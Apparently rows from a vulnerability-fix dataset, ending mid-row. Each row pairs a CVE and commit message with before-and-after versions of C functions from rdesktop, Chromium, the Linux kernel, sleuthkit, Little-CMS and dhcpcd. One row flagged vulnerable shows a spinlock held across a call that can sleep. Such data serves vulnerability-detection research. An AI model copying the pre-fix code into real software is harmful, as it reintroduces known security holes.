Malicious RDP server security fixes This commit includes fixes for a set of 21 vulnerabilities in rdesktop when a malicious RDP server is used. All vulnerabilities was identified and reported by Eyal Itkin. * Add rdp_protocol_error function that is used in several fixes * Refactor of process_bitmap_updates * Fix possible integer overflow in s_check_rem() on 32bit arch * Fix memory corruption in process_bitmap_data - CVE-2018-8794 * Fix remote code execution in process_bitmap_data - CVE-2018-8795 * Fix remote code execution in process_plane - CVE-2018-8797 * Fix Denial of Service in mcs_recv_connect_response - CVE-2018-20175 * Fix Denial of Service in mcs_parse_domain_params - CVE-2018-20175 * Fix Denial of Service in sec_parse_crypt_info - CVE-2018-20176 * Fix Denial of Service in sec_recv - CVE-2018-20176 * Fix minor information leak in rdpdr_process - CVE-2018-8791 * Fix Denial of Service in cssp_read_tsrequest - CVE-2018-8792 * Fix remote code execution in cssp_read_tsrequest - CVE-2018-8793 * Fix Denial of Service in process_bitmap_data - CVE-2018-8796 * Fix minor information leak in rdpsnd_process_ping - CVE-2018-8798 * Fix Denial of Service in process_secondary_order - CVE-2018-8799 * Fix remote code execution in in ui_clip_handle_data - CVE-2018-8800 * Fix major information leak in ui_clip_handle_data - CVE-2018-20174 * Fix memory corruption in rdp_in_unistr - CVE-2018-20177 * Fix Denial of Service in process_demand_active - CVE-2018-20178 * Fix remote code execution in lspci_process - CVE-2018-20179 * Fix remote code execution in rdpsnddbg_process - CVE-2018-20180 * Fix remote code execution in seamless_process - CVE-2018-20181 * Fix remote code execution in seamless_process_line - CVE-2018-20182
rdpdr_send_client_device_list_announce(void) { /* DR_CORE_CLIENT_ANNOUNCE_RSP */ uint32 bloblen, disklen, flags; size_t i; STREAM s; PRINTER *printerinfo; DISK_DEVICE *diskinfo; struct stream drv = { 0 }, prt = { 0}; s = channel_init(rdpdr_channel, announcedata_size()); out_uint16_le(s, RDPDR_CTYP_CORE); out_uint16_le(s, PAKID_CORE_DEVICE_LIST_ANNOUNCE); out_uint32_le(s, g_num_devices); for (i = 0; i < g_num_devices; i++) /* DEVICE_ANNOUNCE */ { out_uint32_le(s, g_rdpdr_device[i].device_type); out_uint32_le(s, i); /* RDP Device ID */ out_uint8p(s, g_rdpdr_device[i].name, 8); /* preferredDosName, limited to 8 characters */ switch (g_rdpdr_device[i].device_type) { case DEVICE_TYPE_DISK: diskinfo = (DISK_DEVICE *) g_rdpdr_device[i].pdevice_data; /* The RDP specification says that the DeviceData is supposed to be a null-terminated Unicode string, but that does not work. In practice the string is expected to be an ASCII string, like a variable-length preferredDosName. */ disklen = strlen(diskinfo->name) + 1; out_uint32_le(s, disklen); /* DeviceDataLength */ out_uint8p(s, diskinfo->name, disklen); /* DeviceData */ break; case DEVICE_TYPE_PRINTER: printerinfo = (PRINTER *) g_rdpdr_device[i].pdevice_data; s_realloc(&prt, 512 * 4); s_reset(&prt); out_utf16s(&prt, printerinfo->printer); s_mark_end(&prt); s_realloc(&drv, 512 * 4); s_reset(&drv); out_utf16s(&drv, printerinfo->driver); s_mark_end(&drv); bloblen = printerinfo->bloblen; flags = 0; if (printerinfo->default_printer) flags |= RDPDR_PRINTER_ANNOUNCE_FLAG_DEFAULTPRINTER; out_uint32_le(s, 24 + s_length(&drv) + s_length(&prt) + bloblen); /* DeviceDataLength */ out_uint32_le(s, flags); /* Flags */ out_uint32_le(s, 0); /* Codepage */ out_uint32_le(s, 0); /* PnPNameLen */ out_uint32_le(s, s_length(&drv)); /* DriverNameLen */ out_uint32_le(s, s_length(&prt)); /* PrinterNameLen */ out_uint32_le(s, bloblen); /* CachedFieldsLen */ out_stream(s, &drv); /* DriverName */ out_stream(s, &prt); /* PrinterName */ out_uint8a(s, printerinfo->blob, bloblen); /* CachedPrinterConfigData */ if (printerinfo->blob) xfree(printerinfo->blob); /* Blob is sent twice if reconnecting */ break; default: out_uint32(s, 0); } } s_mark_end(s); channel_send(s, rdpdr_channel); }
rdpdr_send_client_device_list_announce(void) { /* DR_CORE_CLIENT_ANNOUNCE_RSP */ uint32 bloblen, disklen, flags; size_t i; STREAM s; PRINTER *printerinfo; DISK_DEVICE *diskinfo; struct stream drv = { 0 }, prt = { 0}; s = channel_init(rdpdr_channel, announcedata_size()); out_uint16_le(s, RDPDR_CTYP_CORE); out_uint16_le(s, PAKID_CORE_DEVICE_LIST_ANNOUNCE); out_uint32_le(s, g_num_devices); for (i = 0; i < g_num_devices; i++) /* DEVICE_ANNOUNCE */ { out_uint32_le(s, g_rdpdr_device[i].device_type); out_uint32_le(s, i); /* RDP Device ID */ out_uint8p(s, g_rdpdr_device[i].name, 8); /* preferredDosName, limited to 8 characters */ switch (g_rdpdr_device[i].device_type) { case DEVICE_TYPE_DISK: diskinfo = (DISK_DEVICE *) g_rdpdr_device[i].pdevice_data; /* The RDP specification says that the DeviceData is supposed to be a null-terminated Unicode string, but that does not work. In practice the string is expected to be an ASCII string, like a variable-length preferredDosName. */ disklen = strlen(diskinfo->name) + 1; out_uint32_le(s, disklen); /* DeviceDataLength */ out_uint8p(s, diskinfo->name, disklen); /* DeviceData */ break; case DEVICE_TYPE_PRINTER: printerinfo = (PRINTER *) g_rdpdr_device[i].pdevice_data; s_realloc(&prt, 512 * 4); s_reset(&prt); out_utf16s(&prt, printerinfo->printer); s_mark_end(&prt); s_realloc(&drv, 512 * 4); s_reset(&drv); out_utf16s(&drv, printerinfo->driver); s_mark_end(&drv); bloblen = printerinfo->bloblen; flags = 0; if (printerinfo->default_printer) flags |= RDPDR_PRINTER_ANNOUNCE_FLAG_DEFAULTPRINTER; out_uint32_le(s, 24 + s_length(&drv) + s_length(&prt) + bloblen); /* DeviceDataLength */ out_uint32_le(s, flags); /* Flags */ out_uint32_le(s, 0); /* Codepage */ out_uint32_le(s, 0); /* PnPNameLen */ out_uint32_le(s, s_length(&drv)); /* DriverNameLen */ out_uint32_le(s, s_length(&prt)); /* PrinterNameLen */ out_uint32_le(s, bloblen); /* CachedFieldsLen */ out_stream(s, &drv); /* DriverName */ out_stream(s, &prt); /* PrinterName */ out_uint8a(s, printerinfo->blob, bloblen); /* CachedPrinterConfigData */ if (printerinfo->blob) xfree(printerinfo->blob); /* Blob is sent twice if reconnecting */ break; default: out_uint32(s, 0); } } s_mark_end(s); channel_send(s, rdpdr_channel); }
C
rdesktop
0
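Among the fixes listed above, the 32-bit s_check_rem() overflow is the most reusable pattern: a bounds check written as "p + n <= end" can wrap when n is attacker-controlled, while comparing n against the remaining byte count cannot. A sketch, with the stream fields assumed from rdesktop's STREAM convention:

#include <stdbool.h>
#include <stddef.h>

struct stream_view {
    unsigned char *p;    /* current read position */
    unsigned char *end;  /* one past the last valid byte */
};

static bool s_check_rem_safe(const struct stream_view *s, size_t n)
{
    /* s->p <= s->end is an invariant, so the subtraction is safe and
     * no arithmetic is ever performed on the untrusted n */
    return (size_t)(s->end - s->p) >= n;
}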
null
null
null
https://github.com/chromium/chromium/commit/283fb25624bf253d120708152e23cf9143519198
283fb25624bf253d120708152e23cf9143519198
Coverity; Fixing pass by value bugs. CID=101466, 101464, 101494, 101495, 101496, 101497 BUG=NONE TEST=NONE Review URL: http://codereview.chromium.org/8956046 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@115399 0039d316-1c4b-4281-b951-d872f2087c98
string16 ExtensionInstallUI::Prompt::GetPermission(int index) const { return l10n_util::GetStringFUTF16( IDS_EXTENSION_PERMISSION_LINE, permissions_[index]); }
string16 ExtensionInstallUI::Prompt::GetPermission(int index) const { return l10n_util::GetStringFUTF16( IDS_EXTENSION_PERMISSION_LINE, permissions_[index]); }
C
Chrome
0
CVE-2018-19497
https://www.cvedetails.com/cve/CVE-2018-19497/
CWE-125
https://github.com/sleuthkit/sleuthkit/commit/bc04aa017c0bd297de8a3b7fc40ffc6ddddbb95d
bc04aa017c0bd297de8a3b7fc40ffc6ddddbb95d
Merge pull request #1374 from JordyZomer/develop Fix CVE-2018-19497.
hfs_attrTypeName(uint32_t typeNum) { switch (typeNum) { case TSK_FS_ATTR_TYPE_HFS_DEFAULT: return "DFLT"; case TSK_FS_ATTR_TYPE_HFS_DATA: return "DATA"; case TSK_FS_ATTR_TYPE_HFS_EXT_ATTR: return "ExATTR"; case TSK_FS_ATTR_TYPE_HFS_COMP_REC: return "CMPF"; case TSK_FS_ATTR_TYPE_HFS_RSRC: return "RSRC"; default: return "UNKN"; } }
hfs_attrTypeName(uint32_t typeNum) { switch (typeNum) { case TSK_FS_ATTR_TYPE_HFS_DEFAULT: return "DFLT"; case TSK_FS_ATTR_TYPE_HFS_DATA: return "DATA"; case TSK_FS_ATTR_TYPE_HFS_EXT_ATTR: return "ExATTR"; case TSK_FS_ATTR_TYPE_HFS_COMP_REC: return "CMPF"; case TSK_FS_ATTR_TYPE_HFS_RSRC: return "RSRC"; default: return "UNKN"; } }
C
sleuthkit
0
CVE-2015-6787
https://www.cvedetails.com/cve/CVE-2015-6787/
null
https://github.com/chromium/chromium/commit/f911e11e7f6b5c0d6f5ee694a9871de6619889f7
f911e11e7f6b5c0d6f5ee694a9871de6619889f7
Reland "[CI] Make paint property nodes non-ref-counted" This reverts commit 887383b30842d9d9006e11bb6932660a3cb5b1b7. Reason for revert: Retry in M69. Original change's description: > Revert "[CI] Make paint property nodes non-ref-counted" > > This reverts commit 70fc0b018c9517558b7aa2be00edf2debb449123. > > Reason for revert: Caused bugs found by clusterfuzz > > Original change's description: > > [CI] Make paint property nodes non-ref-counted > > > > Now all paint property nodes are owned by ObjectPaintProperties > > (and LocalFrameView temporarily before removing non-RLS mode). > > Others just use raw pointers or references. > > > > Bug: 833496 > > Cq-Include-Trybots: master.tryserver.blink:linux_trusty_blink_rel;master.tryserver.chromium.linux:linux_layout_tests_slimming_paint_v2 > > Change-Id: I2d544fe153bb94698623248748df63c8aa2081ae > > Reviewed-on: https://chromium-review.googlesource.com/1031101 > > Reviewed-by: Tien-Ren Chen <[email protected]> > > Commit-Queue: Xianzhu Wang <[email protected]> > > Cr-Commit-Position: refs/heads/master@{#554626} > > [email protected],[email protected],[email protected] > > Change-Id: I02bb50d6744cb81a797246a0116b677e80a3c69f > No-Presubmit: true > No-Tree-Checks: true > No-Try: true > Bug: 833496,837932,837943 > Cq-Include-Trybots: master.tryserver.blink:linux_trusty_blink_rel;master.tryserver.chromium.linux:linux_layout_tests_slimming_paint_v2 > Reviewed-on: https://chromium-review.googlesource.com/1034292 > Reviewed-by: Xianzhu Wang <[email protected]> > Commit-Queue: Xianzhu Wang <[email protected]> > Cr-Commit-Position: refs/heads/master@{#554653} [email protected],[email protected],[email protected] # Not skipping CQ checks because original CL landed > 1 day ago. Bug: 833496, 837932, 837943 Change-Id: I0b4ef70db1f1f211ba97c30d617225355c750992 Cq-Include-Trybots: master.tryserver.blink:linux_trusty_blink_rel;master.tryserver.chromium.linux:linux_layout_tests_slimming_paint_v2 Reviewed-on: https://chromium-review.googlesource.com/1083491 Commit-Queue: Xianzhu Wang <[email protected]> Reviewed-by: Xianzhu Wang <[email protected]> Cr-Commit-Position: refs/heads/master@{#563930}
CompositedLayerRasterInvalidatorTest& Properties( const TransformPaintPropertyNode& t, const ClipPaintPropertyNode& c, const EffectPaintPropertyNode& e) { Properties(PropertyTreeState(&t, &c, &e)); return *this; }
CompositedLayerRasterInvalidatorTest& Properties( const RefCountedPropertyTreeState& state) { data_.chunks.back().properties = state; return *this; }
C
Chrome
1
CVE-2019-7308
https://www.cvedetails.com/cve/CVE-2019-7308/
CWE-189
https://github.com/torvalds/linux/commit/d3bd7413e0ca40b60cf60d4003246d067cafdeda
d3bd7413e0ca40b60cf60d4003246d067cafdeda
bpf: fix sanitation of alu op with pointer / scalar type from different paths While 979d63d50c0c ("bpf: prevent out of bounds speculation on pointer arithmetic") took care of rejecting alu op on pointer when e.g. pointer came from two different map values with different map properties such as value size, Jann reported that a case was not covered yet when a given alu op is used in both "ptr_reg += reg" and "numeric_reg += reg" from different branches where we would incorrectly try to sanitize based on the pointer's limit. Catch this corner case and reject the program instead. Fixes: 979d63d50c0c ("bpf: prevent out of bounds speculation on pointer arithmetic") Reported-by: Jann Horn <[email protected]> Signed-off-by: Daniel Borkmann <[email protected]> Acked-by: Alexei Starovoitov <[email protected]> Signed-off-by: Alexei Starovoitov <[email protected]>
static void clean_func_state(struct bpf_verifier_env *env, struct bpf_func_state *st) { enum bpf_reg_liveness live; int i, j; for (i = 0; i < BPF_REG_FP; i++) { live = st->regs[i].live; /* liveness must not touch this register anymore */ st->regs[i].live |= REG_LIVE_DONE; if (!(live & REG_LIVE_READ)) /* since the register is unused, clear its state * to make further comparison simpler */ __mark_reg_not_init(&st->regs[i]); } for (i = 0; i < st->allocated_stack / BPF_REG_SIZE; i++) { live = st->stack[i].spilled_ptr.live; /* liveness must not touch this stack slot anymore */ st->stack[i].spilled_ptr.live |= REG_LIVE_DONE; if (!(live & REG_LIVE_READ)) { __mark_reg_not_init(&st->stack[i].spilled_ptr); for (j = 0; j < BPF_REG_SIZE; j++) st->stack[i].slot_type[j] = STACK_INVALID; } } }
static void clean_func_state(struct bpf_verifier_env *env, struct bpf_func_state *st) { enum bpf_reg_liveness live; int i, j; for (i = 0; i < BPF_REG_FP; i++) { live = st->regs[i].live; /* liveness must not touch this register anymore */ st->regs[i].live |= REG_LIVE_DONE; if (!(live & REG_LIVE_READ)) /* since the register is unused, clear its state * to make further comparison simpler */ __mark_reg_not_init(&st->regs[i]); } for (i = 0; i < st->allocated_stack / BPF_REG_SIZE; i++) { live = st->stack[i].spilled_ptr.live; /* liveness must not touch this stack slot anymore */ st->stack[i].spilled_ptr.live |= REG_LIVE_DONE; if (!(live & REG_LIVE_READ)) { __mark_reg_not_init(&st->stack[i].spilled_ptr); for (j = 0; j < BPF_REG_SIZE; j++) st->stack[i].slot_type[j] = STACK_INVALID; } } }
C
linux
0
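The corner case this commit message describes can be sketched as per-instruction bookkeeping: the verifier remembers how an ALU instruction was sanitized the first time it was reached, and rejects the program when another path reaches the same instruction with an incompatible pointer/scalar state or limit. This is a simplified illustration of the idea, not the real verifier structures.

#include <errno.h>

struct insn_aux_sketch {
    unsigned int alu_state;   /* 0 = instruction not seen yet */
    unsigned int alu_limit;
};

static int update_alu_sanitation_state(struct insn_aux_sketch *aux,
                                       unsigned int alu_state,
                                       unsigned int alu_limit)
{
    if (aux->alu_state &&
        (aux->alu_state != alu_state || aux->alu_limit != alu_limit))
        return -EACCES;       /* same insn, conflicting paths: reject */
    aux->alu_state = alu_state;
    aux->alu_limit = alu_limit;
    return 0;
}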
CVE-2017-8071
https://www.cvedetails.com/cve/CVE-2017-8071/
CWE-404
https://github.com/torvalds/linux/commit/7a7b5df84b6b4e5d599c7289526eed96541a0654
7a7b5df84b6b4e5d599c7289526eed96541a0654
HID: cp2112: fix sleep-while-atomic A recent commit fixing DMA-buffers on stack added a shared transfer buffer protected by a spinlock. This is broken as the USB HID request callbacks can sleep. Fix this up by replacing the spinlock with a mutex. Fixes: 1ffb3c40ffb5 ("HID: cp2112: make transfer buffers DMA capable") Cc: stable <[email protected]> # 4.9 Signed-off-by: Johan Hovold <[email protected]> Reviewed-by: Benjamin Tissoires <[email protected]> Signed-off-by: Jiri Kosina <[email protected]>
static int cp2112_gpio_get_all(struct gpio_chip *chip) { struct cp2112_device *dev = gpiochip_get_data(chip); struct hid_device *hdev = dev->hdev; u8 *buf = dev->in_out_buffer; int ret; mutex_lock(&dev->lock); ret = hid_hw_raw_request(hdev, CP2112_GPIO_GET, buf, CP2112_GPIO_GET_LENGTH, HID_FEATURE_REPORT, HID_REQ_GET_REPORT); if (ret != CP2112_GPIO_GET_LENGTH) { hid_err(hdev, "error requesting GPIO values: %d\n", ret); ret = ret < 0 ? ret : -EIO; goto exit; } ret = buf[1]; exit: mutex_unlock(&dev->lock); return ret; }
static int cp2112_gpio_get_all(struct gpio_chip *chip) { struct cp2112_device *dev = gpiochip_get_data(chip); struct hid_device *hdev = dev->hdev; u8 *buf = dev->in_out_buffer; unsigned long flags; int ret; spin_lock_irqsave(&dev->lock, flags); ret = hid_hw_raw_request(hdev, CP2112_GPIO_GET, buf, CP2112_GPIO_GET_LENGTH, HID_FEATURE_REPORT, HID_REQ_GET_REPORT); if (ret != CP2112_GPIO_GET_LENGTH) { hid_err(hdev, "error requesting GPIO values: %d\n", ret); ret = ret < 0 ? ret : -EIO; goto exit; } ret = buf[1]; exit: spin_unlock_irqrestore(&dev->lock, flags); return ret; }
C
linux
1
CVE-2016-5219
https://www.cvedetails.com/cve/CVE-2016-5219/
CWE-416
https://github.com/chromium/chromium/commit/a4150b688a754d3d10d2ca385155b1c95d77d6ae
a4150b688a754d3d10d2ca385155b1c95d77d6ae
Add GL_PROGRAM_COMPLETION_QUERY_CHROMIUM This makes the query of GL_COMPLETION_STATUS_KHR to programs much cheaper by minimizing the round-trip to the GPU thread. Bug: 881152, 957001 Change-Id: Iadfa798af29225e752c710ca5c25f50b3dd3101a Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1586630 Commit-Queue: Kenneth Russell <[email protected]> Reviewed-by: Kentaro Hara <[email protected]> Reviewed-by: Geoff Lang <[email protected]> Reviewed-by: Kenneth Russell <[email protected]> Cr-Commit-Position: refs/heads/master@{#657568}
error::Error GLES2DecoderPassthroughImpl::DoTexStorage2DImageCHROMIUM( GLenum target, GLenum internalFormat, GLenum bufferUsage, GLsizei width, GLsizei height) { NOTIMPLEMENTED(); return error::kNoError; }
error::Error GLES2DecoderPassthroughImpl::DoTexStorage2DImageCHROMIUM( GLenum target, GLenum internalFormat, GLenum bufferUsage, GLsizei width, GLsizei height) { NOTIMPLEMENTED(); return error::kNoError; }
C
Chrome
0
CVE-2015-5156
https://www.cvedetails.com/cve/CVE-2015-5156/
CWE-119
https://github.com/torvalds/linux/commit/48900cb6af4282fa0fb6ff4d72a81aa3dadb5c39
48900cb6af4282fa0fb6ff4d72a81aa3dadb5c39
virtio-net: drop NETIF_F_FRAGLIST virtio declares support for NETIF_F_FRAGLIST, but assumes that there are at most MAX_SKB_FRAGS + 2 fragments which isn't always true with a fraglist. A longer fraglist in the skb will make the call to skb_to_sgvec overflow the sg array, leading to memory corruption. Drop NETIF_F_FRAGLIST so we only get what we can handle. Cc: Michael S. Tsirkin <[email protected]> Signed-off-by: Jason Wang <[email protected]> Acked-by: Michael S. Tsirkin <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static struct sk_buff *receive_big(struct net_device *dev, struct virtnet_info *vi, struct receive_queue *rq, void *buf, unsigned int len) { struct page *page = buf; struct sk_buff *skb = page_to_skb(vi, rq, page, 0, len, PAGE_SIZE); if (unlikely(!skb)) goto err; return skb; err: dev->stats.rx_dropped++; give_pages(rq, page); return NULL; }
static struct sk_buff *receive_big(struct net_device *dev, struct virtnet_info *vi, struct receive_queue *rq, void *buf, unsigned int len) { struct page *page = buf; struct sk_buff *skb = page_to_skb(vi, rq, page, 0, len, PAGE_SIZE); if (unlikely(!skb)) goto err; return skb; err: dev->stats.rx_dropped++; give_pages(rq, page); return NULL; }
C
linux
0
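The fix this commit message describes amounts to one change at device setup: stop advertising NETIF_F_FRAGLIST so the networking core never hands virtio-net an skb whose fraglist expands to more than MAX_SKB_FRAGS + 2 scatterlist entries. A kernel-context sketch of that pattern (the actual patch drops the flag from the feature lists at probe time; clearing it afterwards has the same effect):

#include <linux/netdevice.h>

static void drop_fraglist_feature(struct net_device *dev)
{
    dev->hw_features &= ~NETIF_F_FRAGLIST;
    dev->features &= ~NETIF_F_FRAGLIST;
}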
CVE-2018-7757
https://www.cvedetails.com/cve/CVE-2018-7757/
CWE-772
https://github.com/torvalds/linux/commit/4a491b1ab11ca0556d2fda1ff1301e862a2d44c4
4a491b1ab11ca0556d2fda1ff1301e862a2d44c4
scsi: libsas: fix memory leak in sas_smp_get_phy_events() We've got a memory leak with the following producer: while true; do cat /sys/class/sas_phy/phy-1:0:12/invalid_dword_count >/dev/null; done The buffer req is allocated and not freed after we return. Fix it. Fixes: 2908d778ab3e ("[SCSI] aic94xx: new driver") Signed-off-by: Jason Yan <[email protected]> CC: John Garry <[email protected]> CC: chenqilin <[email protected]> CC: chenxiang <[email protected]> Reviewed-by: Christoph Hellwig <[email protected]> Reviewed-by: Hannes Reinecke <[email protected]> Signed-off-by: Martin K. Petersen <[email protected]>
static int sas_ex_general(struct domain_device *dev) { u8 *rg_req; struct smp_resp *rg_resp; int res; int i; rg_req = alloc_smp_req(RG_REQ_SIZE); if (!rg_req) return -ENOMEM; rg_resp = alloc_smp_resp(RG_RESP_SIZE); if (!rg_resp) { kfree(rg_req); return -ENOMEM; } rg_req[1] = SMP_REPORT_GENERAL; for (i = 0; i < 5; i++) { res = smp_execute_task(dev, rg_req, RG_REQ_SIZE, rg_resp, RG_RESP_SIZE); if (res) { SAS_DPRINTK("RG to ex %016llx failed:0x%x\n", SAS_ADDR(dev->sas_addr), res); goto out; } else if (rg_resp->result != SMP_RESP_FUNC_ACC) { SAS_DPRINTK("RG:ex %016llx returned SMP result:0x%x\n", SAS_ADDR(dev->sas_addr), rg_resp->result); res = rg_resp->result; goto out; } ex_assign_report_general(dev, rg_resp); if (dev->ex_dev.configuring) { SAS_DPRINTK("RG: ex %llx self-configuring...\n", SAS_ADDR(dev->sas_addr)); schedule_timeout_interruptible(5*HZ); } else break; } out: kfree(rg_req); kfree(rg_resp); return res; }
static int sas_ex_general(struct domain_device *dev) { u8 *rg_req; struct smp_resp *rg_resp; int res; int i; rg_req = alloc_smp_req(RG_REQ_SIZE); if (!rg_req) return -ENOMEM; rg_resp = alloc_smp_resp(RG_RESP_SIZE); if (!rg_resp) { kfree(rg_req); return -ENOMEM; } rg_req[1] = SMP_REPORT_GENERAL; for (i = 0; i < 5; i++) { res = smp_execute_task(dev, rg_req, RG_REQ_SIZE, rg_resp, RG_RESP_SIZE); if (res) { SAS_DPRINTK("RG to ex %016llx failed:0x%x\n", SAS_ADDR(dev->sas_addr), res); goto out; } else if (rg_resp->result != SMP_RESP_FUNC_ACC) { SAS_DPRINTK("RG:ex %016llx returned SMP result:0x%x\n", SAS_ADDR(dev->sas_addr), rg_resp->result); res = rg_resp->result; goto out; } ex_assign_report_general(dev, rg_resp); if (dev->ex_dev.configuring) { SAS_DPRINTK("RG: ex %llx self-configuring...\n", SAS_ADDR(dev->sas_addr)); schedule_timeout_interruptible(5*HZ); } else break; } out: kfree(rg_req); kfree(rg_resp); return res; }
C
linux
0
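The leak this commit message describes (in sas_smp_get_phy_events(), not the function shown above) has a standard shape: a request buffer is allocated, some path returns, and the buffer is never released. The idiomatic fix funnels every path through one cleanup label, sketched here with illustrative names and sizes:

#include <stdlib.h>

#define PHY_REQ_SIZE  44
#define PHY_RESP_SIZE 56

static int execute_task(unsigned char *req, unsigned char *resp)
{
    (void)req; (void)resp;   /* placeholder for the SMP transfer */
    return 0;
}

static int get_phy_events_sketch(void)
{
    int res = -1;
    unsigned char *req = calloc(1, PHY_REQ_SIZE);
    unsigned char *resp = calloc(1, PHY_RESP_SIZE);

    if (!req || !resp)
        goto out;
    res = execute_task(req, resp);
out:
    free(resp);              /* free(NULL) is a no-op */
    free(req);               /* the upstream fix adds this release */
    return res;
}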
CVE-2018-16435
https://www.cvedetails.com/cve/CVE-2018-16435/
CWE-190
https://github.com/mm2/Little-CMS/commit/768f70ca405cd3159d990e962d54456773bb8cf8
768f70ca405cd3159d990e962d54456773bb8cf8
Upgrade Visual studio 2017 15.8 - Upgrade to 15.8 - Add check on CGATS memory allocation (thanks to Quang Nguyen for pointing out this)
void CMSEXPORT cmsIT8Free(cmsHANDLE hIT8) { cmsIT8* it8 = (cmsIT8*) hIT8; if (it8 == NULL) return; if (it8->MemorySink) { OWNEDMEM* p; OWNEDMEM* n; for (p = it8->MemorySink; p != NULL; p = n) { n = p->Next; if (p->Ptr) _cmsFree(it8 ->ContextID, p->Ptr); _cmsFree(it8 ->ContextID, p); } } if (it8->MemoryBlock) _cmsFree(it8 ->ContextID, it8->MemoryBlock); _cmsFree(it8 ->ContextID, it8); }
void CMSEXPORT cmsIT8Free(cmsHANDLE hIT8) { cmsIT8* it8 = (cmsIT8*) hIT8; if (it8 == NULL) return; if (it8->MemorySink) { OWNEDMEM* p; OWNEDMEM* n; for (p = it8->MemorySink; p != NULL; p = n) { n = p->Next; if (p->Ptr) _cmsFree(it8 ->ContextID, p->Ptr); _cmsFree(it8 ->ContextID, p); } } if (it8->MemoryBlock) _cmsFree(it8 ->ContextID, it8->MemoryBlock); _cmsFree(it8 ->ContextID, it8); }
C
Little-CMS
0
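The hardening this commit message mentions ("add check on CGATS memory allocation") is the classic unchecked-allocation fix: a parser-controlled table size can make the allocation fail, and the result must be tested before use. A minimal sketch, not the exact lcms helper:

#include <stdlib.h>

/* allocate n cell pointers for a CGATS-style table; returns NULL on
 * failure so the caller can abort the parse instead of dereferencing */
static char **allocate_cells(size_t n)
{
    char **cells = calloc(n, sizeof(char *));  /* calloc guards n*size overflow */
    return cells;                              /* caller must check for NULL */
}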
CVE-2016-1503
https://www.cvedetails.com/cve/CVE-2016-1503/
CWE-119
https://android.googlesource.com/platform/external/dhcpcd/+/1390ace71179f04a09c300ee8d0300aa69d9db09
1390ace71179f04a09c300ee8d0300aa69d9db09
Improve length checks in DHCP Options parsing of dhcpcd. Bug: 26461634 Change-Id: Ic4c2eb381a6819e181afc8ab13891f3fc58b7deb
configure_env(char **env, const char *prefix, const struct dhcp_message *dhcp, const struct if_options *ifo) { unsigned int i; const uint8_t *p; int pl; struct in_addr addr; struct in_addr net; struct in_addr brd; char *val, *v; const struct dhcp_opt *opt; ssize_t len, e = 0; char **ep; char cidr[4]; uint8_t overl = 0; get_option_uint8(&overl, dhcp, DHO_OPTIONSOVERLOADED); if (!env) { for (opt = dhcp_opts; opt->option; opt++) { if (!opt->var) continue; if (has_option_mask(ifo->nomask, opt->option)) continue; if (get_option_raw(dhcp, opt->option)) e++; } if (dhcp->yiaddr || dhcp->ciaddr) e += 5; if (*dhcp->bootfile && !(overl & 1)) e++; if (*dhcp->servername && !(overl & 2)) e++; return e; } ep = env; if (dhcp->yiaddr || dhcp->ciaddr) { /* Set some useful variables that we derive from the DHCP * message but are not necessarily in the options */ addr.s_addr = dhcp->yiaddr ? dhcp->yiaddr : dhcp->ciaddr; setvar(&ep, prefix, "ip_address", inet_ntoa(addr)); if (get_option_addr(&net, dhcp, DHO_SUBNETMASK) == -1) { net.s_addr = get_netmask(addr.s_addr); setvar(&ep, prefix, "subnet_mask", inet_ntoa(net)); } i = inet_ntocidr(net); snprintf(cidr, sizeof(cidr), "%d", inet_ntocidr(net)); setvar(&ep, prefix, "subnet_cidr", cidr); if (get_option_addr(&brd, dhcp, DHO_BROADCAST) == -1) { brd.s_addr = addr.s_addr | ~net.s_addr; setvar(&ep, prefix, "broadcast_address", inet_ntoa(brd)); } addr.s_addr = dhcp->yiaddr & net.s_addr; setvar(&ep, prefix, "network_number", inet_ntoa(addr)); } if (*dhcp->bootfile && !(overl & 1)) setvar(&ep, prefix, "filename", (const char *)dhcp->bootfile); if (*dhcp->servername && !(overl & 2)) setvar(&ep, prefix, "server_name", (const char *)dhcp->servername); for (opt = dhcp_opts; opt->option; opt++) { if (!opt->var) continue; if (has_option_mask(ifo->nomask, opt->option)) continue; val = NULL; p = get_option(dhcp, opt->option, &pl, NULL); if (!p) continue; /* We only want the FQDN name */ if (opt->option == DHO_FQDN) { p += 3; pl -= 3; } len = print_option(NULL, 0, opt->type, pl, p); if (len < 0) return -1; e = strlen(prefix) + strlen(opt->var) + len + 4; v = val = *ep++ = xmalloc(e); v += snprintf(val, e, "%s_%s=", prefix, opt->var); if (len != 0) print_option(v, len, opt->type, pl, p); } return ep - env; }
configure_env(char **env, const char *prefix, const struct dhcp_message *dhcp, const struct if_options *ifo) { unsigned int i; const uint8_t *p; int pl; struct in_addr addr; struct in_addr net; struct in_addr brd; char *val, *v; const struct dhcp_opt *opt; ssize_t len, e = 0; char **ep; char cidr[4]; uint8_t overl = 0; get_option_uint8(&overl, dhcp, DHO_OPTIONSOVERLOADED); if (!env) { for (opt = dhcp_opts; opt->option; opt++) { if (!opt->var) continue; if (has_option_mask(ifo->nomask, opt->option)) continue; if (get_option_raw(dhcp, opt->option)) e++; } if (dhcp->yiaddr || dhcp->ciaddr) e += 5; if (*dhcp->bootfile && !(overl & 1)) e++; if (*dhcp->servername && !(overl & 2)) e++; return e; } ep = env; if (dhcp->yiaddr || dhcp->ciaddr) { /* Set some useful variables that we derive from the DHCP * message but are not necessarily in the options */ addr.s_addr = dhcp->yiaddr ? dhcp->yiaddr : dhcp->ciaddr; setvar(&ep, prefix, "ip_address", inet_ntoa(addr)); if (get_option_addr(&net, dhcp, DHO_SUBNETMASK) == -1) { net.s_addr = get_netmask(addr.s_addr); setvar(&ep, prefix, "subnet_mask", inet_ntoa(net)); } i = inet_ntocidr(net); snprintf(cidr, sizeof(cidr), "%d", inet_ntocidr(net)); setvar(&ep, prefix, "subnet_cidr", cidr); if (get_option_addr(&brd, dhcp, DHO_BROADCAST) == -1) { brd.s_addr = addr.s_addr | ~net.s_addr; setvar(&ep, prefix, "broadcast_address", inet_ntoa(brd)); } addr.s_addr = dhcp->yiaddr & net.s_addr; setvar(&ep, prefix, "network_number", inet_ntoa(addr)); } if (*dhcp->bootfile && !(overl & 1)) setvar(&ep, prefix, "filename", (const char *)dhcp->bootfile); if (*dhcp->servername && !(overl & 2)) setvar(&ep, prefix, "server_name", (const char *)dhcp->servername); for (opt = dhcp_opts; opt->option; opt++) { if (!opt->var) continue; if (has_option_mask(ifo->nomask, opt->option)) continue; val = NULL; p = get_option(dhcp, opt->option, &pl, NULL); if (!p) continue; /* We only want the FQDN name */ if (opt->option == DHO_FQDN) { p += 3; pl -= 3; } len = print_option(NULL, 0, 